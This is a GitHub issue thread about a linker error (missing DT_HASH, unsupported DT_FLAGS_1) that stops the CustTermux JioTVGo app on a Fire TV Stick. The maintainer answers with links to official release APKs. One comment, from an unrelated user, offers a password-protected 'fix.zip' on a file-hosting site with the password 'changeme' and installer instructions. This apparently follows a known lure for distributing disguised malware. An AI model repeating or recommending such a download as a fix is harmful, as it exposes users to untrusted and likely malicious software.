### ISSUE TITLE
[Bug]: Unsupported flags DT_FLAGS_1=8000001

### ISSUE THREAD

**Issue by crypto0007** [siddharthsky/CustTermux-JioTVGo#32]
### Problem description

When opened the app for the first time stucked at error. Trying om Amazon firetv stick.

### What steps will reproduce the bug?

When opened for the first time.

### System information

```shell
Amazon FireTv stick.
Unsupported flags DT_FLAGS_1=8000001

: linker: Unsupported flags DT_FLAGS_1=0x8000001

WARNING: linker: /data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go: unused DT entry: type 0x6ffffef5 arg 0x68c WARNING: linker: /data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go: unused DT entry: type 0x6ffffffe arg 0x64c

WARNING: linker: /data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go: unused DT entry: type 0x6fffffff arg 0x2

CANNOT LINK EXECUTABLE: empty/missing DT_HASH in "/data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go" (built with--hash-style-gnu?

) Starting: Intent { act=com.termux.SKY_ACTION cmp=com.termux/.SkyActionActivity (has extras) }
```

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by siddharthsky** [comment]
> ### Problem description
> 
> When opened the app for the first time stucked at error. Trying om Amazon firetv stick.
> ### What steps will reproduce the bug?
> 
> When opened for the first time.
> ### What is the expected behavior?
> 
> _No response_
> ### System information
> 
> ```shell
> Amazon FireTv stick.
> Unsupported flags DT_FLAGS_1=8000001
> 
> : linker: Unsupported flags DT_FLAGS_1=0x8000001
> 
> WARNING: linker: /data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go: unused DT entry: type 0x6ffffef5 arg 0x68c WARNING: linker: /data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go: unused DT entry: type 0x6ffffffe arg 0x64c
> 
> WARNING: linker: /data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go: unused DT entry: type 0x6fffffff arg 0x2
> 
> CANNOT LINK EXECUTABLE: empty/missing DT_HASH in "/data/data/com.termux/files/home/.jiotv_go/bin/jiotv_go" (built with--hash-style-gnu?
> 
> ) Starting: Intent { act=com.termux.SKY_ACTION cmp=com.termux/.SkyActionActivity (has extras) }
> ```

Use https://github.com/siddharthsky/CustTermux-JioTVGo/releases/download/x0.123.4/CustTermux_4.0_android_5_universal_compatible_older_devices.apk

**Comment by crypto0007** [comment]
Uses this apk. The issue still persist.
The same error is occurring. Tried 4.1 for old it's same. Tried 4.2 for old it's the same. The same error is occurring

**Comment by siddharthsky** [comment]
> Used this apk. The issue still persist. The same error is occurring. Tried 4.1 for old it's same. Tried 4.2 for old it's the same. The same error is occurring

I have updated the go binary and script (version v6.9.2 [5 series]). Install latest CustTermux v4.2 android 5 compatible apk. 

https://github.com/siddharthsky/CustTermux-JioTVGo/releases/download/x0.123.6/CustTermux_4.2_android_5_universal_compatible_only_for_older_devices.apk
